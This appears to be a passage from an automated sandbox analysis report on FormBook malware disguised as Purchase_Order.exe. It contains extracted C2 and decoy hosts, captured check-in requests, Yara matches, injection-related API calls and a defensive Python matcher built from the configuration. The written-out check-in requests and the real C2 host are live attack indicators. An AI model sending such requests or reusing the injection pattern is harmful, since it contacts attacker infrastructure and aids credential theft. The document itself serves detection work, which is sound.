Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 11 Jun 2021 13:02:33 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
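Every request above has the same shape: a GET to the path taken from the C2 list (/uqf5/), a long base64-looking value under a short random-looking parameter name, a second short parameter, a Host header drawn from the decoy list (or the real C2 host), Connection: close and no User-Agent. The three ET signatures fire against five different destination IPs precisely because the same request goes to decoy hosts as well as the real one, and the 404 above is not tied to any particular host on this page, so a matcher should key on the request and not on the response. As an added example, not taken from the report or from any Snort/ET rule, the Python below turns the extracted configuration into such a matcher and runs it over request lines constructed from the traffic above plus a benign request. The decoy list is trimmed to the hosts that appear in the capture, the base64 length floor and the "four of five indicators" threshold are assumptions, and the parameter names are deliberately not hardcoded because they change per build.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# Configuration as extracted above (copied from the report; decoy list trimmed
# to the hosts that appear in the captured requests).
CONFIG = {
    "C2 list": ["www.culturalinterface.net/uqf5/"],
    "decoy": ["prltoday.com", "gorditasdemaiz.com", "mexicobeachselfstorage.com",
              "tylerrucarean.com", "cgjanvier.com", "flockuplabs.com", "toolbnbapp.com",
              "trainup-wall.com", "paolograssino.com", "a-prime-india-demataccount.zone"],
}

# Constructed raw requests: the first two reproduce requests from the capture above
# (decoy host, then the real C2 host); the third is a benign request for contrast.
REQUESTS = [
    "GET /uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT HTTP/1.1\r\n"
    "Host: www.prltoday.com\r\nConnection: close\r\n\r\n",
    "GET /uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DT HTTP/1.1\r\n"
    "Host: www.culturalinterface.net\r\nConnection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
]


def parse_request(raw):
    """(method, target, {lower-case header: value}) from a raw HTTP/1.1 request."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, target, _version = head[0].split(" ", 2)
    headers = {}
    for line in head[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, target, headers


def c2_paths(config):
    """Paths from the C2 list: "www.culturalinterface.net/uqf5/" -> "/uqf5/"."""
    return {"/" + entry.split("/", 1)[1] for entry in config["C2 list"] if "/" in entry}


def c2_hosts(config):
    """C2 hosts plus every decoy, with and without the www. prefix the sample uses."""
    hosts = {entry.split("/", 1)[0].lower() for entry in config["C2 list"]}
    for decoy in config["decoy"]:
        hosts.add(decoy.lower())
        hosts.add("www." + decoy.lower())
    return hosts


def looks_base64(value, min_len=40):
    """Assumption: a check-in payload is at least min_len chars of valid base64."""
    if len(value) < min_len or not re.fullmatch(r"[A-Za-z0-9+/]+=*", value):
        return False
    try:
        base64.b64decode(value, validate=True)
        return True
    except binascii.Error:
        return False


def classify(raw, config):
    """Indicators matched by one request; an empty list means no match."""
    method, target, headers = parse_request(raw)
    parts = urlsplit(target)
    # Split the query by hand: '+' is part of the base64 payload, and
    # urllib's parse_qsl would decode it to a space.
    params = [p.partition("=") for p in parts.query.split("&") if p]
    hits = []
    if method == "GET" and parts.path in c2_paths(config):
        hits.append("c2_path")
    if headers.get("host", "").lower() in c2_hosts(config):
        hits.append("config_host")
    if params and looks_base64(params[0][2]):
        hits.append("base64_first_param")
    if "user-agent" not in headers:
        hits.append("no_user_agent")
    if headers.get("connection", "").lower() == "close":
        hits.append("connection_close")
    return hits


def is_checkin(raw, config, threshold=4):
    """Assumption: four of the five indicators is enough to call it a check-in."""
    return len(classify(raw, config)) >= threshold


if __name__ == "__main__":
    for raw in REQUESTS:
        print(is_checkin(raw, CONFIG), classify(raw, CONFIG))
```

Keying on the config path and host list catches the decoy traffic as well as the real check-in, which matters because blocking only www.culturalinterface.net leaves the decoy requests as the visible signal on the wire. The http://www.fontbureau.com, carterandcone.com, founder.com.cn, galapagosdesign.com and jiyu-kobo.co.jp strings listed under this section are font-vendor URLs of the kind normally embedded in font metadata loaded by .NET and by explorer.exe; they are not network indicators and are deliberately left out of the host list.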
Source: Purchase_Order.exe, 00000000.00000003.241548215.00000000061F2000.00000004.00000001.sdmp | String found in binary or memory: http://en.w
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000007.00000000.291833894.000000000EBF8000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000007.00000000.291833894.000000000EBF8000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.micr
Source: Purchase_Order.exe, 00000000.00000002.259634056.0000000002AD1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Purchase_Order.exe, 00000000.00000003.245364083.00000000061EE000.00000004.00000001.sdmp | String found in binary or memory: http://www.agfamonotype.
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000007.00000000.282669456.0000000006840000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Purchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: Purchase_Order.exe, 00000000.00000003.242455042.00000000061CD000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coma
Source: Purchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comen
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Purchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.commd
Source: Purchase_Order.exe, 00000000.00000002.269184385.00000000061CE000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Purchase_Order.exe, 00000000.00000003.245036335.00000000061EE000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Purchase_Order.exe, 00000000.00000003.248726624.00000000061EE000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: Purchase_Order.exe | String found in binary or memory: http://www.google.com
Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp, Purchase_Order.exe, 00000000.00000003.243172768.00000000061CA000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/=
Source: Purchase_Order.exe, 00000000.00000003.243172768.00000000061CA000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/N
Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Q
            Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/X
            Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/b
            Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/N
            Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Q
            Source: Purchase_Order.exe, 00000000.00000003.243047372.00000000061C3000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/oi
            Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/u
            Source: Purchase_Order.exe, 00000000.00000003.250232182.00000000061ED000.00000004.00000001.sdmp, Purchase_Order.exe, 00000000.00000003.245076408.00000000061EE000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Purchase_Order.exe, 00000000.00000003.243758051.00000000061F1000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com-u
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match | File source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Initial sample is a PE file and has a suspicious name
            Source: initial sample | Static PE information: Filename: Purchase_Order.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_004181C0 NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00418270 NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_004182F0 NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_004183A0 NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041826A NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_004182EE NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041839A NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B98F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B97A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9950 NtQueueApcThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B99D0 NtCreateProcessEx,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9820 NtEnumerateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012BB040 NtSuspendThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B98A0 NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9B00 NtSetValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012BA3B0 NtGetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9A10 NtQuerySection,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9A80 NtOpenDirectoryObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9520 NtWaitForSingleObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012BAD30 NtSetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9560 NtWriteFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B95F0 NtQueryInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9730 NtQueryVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012BA710 NtOpenProcessToken,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9760 NtOpenProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9770 NtSetInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012BA770 NtOpenThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9610 NtEnumerateValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9670 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B9650 NtQueryValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B96D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FAAD30 NtSetContextThread,
